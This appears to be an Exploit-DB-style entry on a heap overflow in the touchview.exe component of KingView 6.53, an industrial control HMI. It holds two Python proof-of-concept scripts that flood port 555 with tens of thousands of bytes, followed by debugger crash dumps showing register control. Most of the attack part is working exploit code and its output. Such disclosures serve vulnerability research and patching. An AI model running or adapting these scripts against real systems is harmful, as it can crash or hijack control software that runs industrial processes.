Kingview 6.53 touchview.exe heap overflow 2

vendor:

Kingview

by:

Carlos Mario Penagos Hollmann

7.5

CVSS

HIGH

Heap Overflow

122

CWE

Product Name: Kingview

Affected Version From: 6.53

Affected Version To: 6.53

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows SP 1

2012

Kingview 6.53 touchview.exe heap overflow 2

This exploit allows an attacker to trigger a heap overflow vulnerability in the touchview.exe component of Kingview version 6.53. By sending a specially crafted packet to the network configuration interface, an attacker can cause a buffer overflow and potentially execute arbitrary code on the targeted system. This vulnerability was already patched by the vendor silently.

Mitigation:

Apply the latest patch provided by the vendor.

Source

Exploit-DB raw data:

# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then  go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.

import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748
edi=00000004
eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0         nv up ei pl nz na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010206
ntdll!tan+0xcf:
7c902a9d 8b18            mov     ebx,dword ptr [eax]  ds:0023:42424242=?????
c902a8d 55              push    ebp
7c902a8e 8be9            mov     ebp,ecx
7c902a90 8b5504          mov     edx,dword ptr [ebp+4]
7c902a93 8b4500          mov     eax,dword ptr [ebp]
7c902a96 0bc0            or      eax,eax
7c902a98 740c            je      ntdll!tan+0xd8 (7c902aa6)
7c902a9a 8d4aff          lea     ecx,[edx-1]
7c902a9d 8b18            mov     ebx,dword ptr [eax]
ds:0023:42424242=????????
7c902a9f f00fc74d00      lock cmpxchg8b qword ptr [ebp]
7c902aa4 75f0            jne     ntdll!tan+0xc8 (7c902a96)
7c902aa6 5d              pop     ebp
7c902aa7 5b              pop     ebx
7c902aa8 c3              ret
7c902aa9 8d4900          lea     ecx,[ecx]
7c902aac 8f0424          pop     dword ptr [esp]
7c902aaf 90              nop
7c902ab0 53              push    ebx
7c902ab1 55              push    ebp



###############################################################


# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.


import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("B"*80000)




s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

7c91b1ea 8b4610 mov eax,dword ptr [esi+10h]
7c91b1ed 3bc3 cmp eax,ebx
7c91b1ef 8945fc mov dword ptr [ebp-4],eax
7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f
(7c91b296)
7c91b1f8 8b06 mov eax,dword ptr [esi]
7c91b1fa ff4010 inc dword ptr [eax+10h]
ds:0023:42424252=????????
7c91b1fd 8b45fc mov eax,dword ptr [ebp-4]
7c91b200 83e001 and eax,1
7c91b203 8945e8 mov dword ptr [ebp-18h],eax


ntdll!RtlpWaitForCriticalSection+0x5b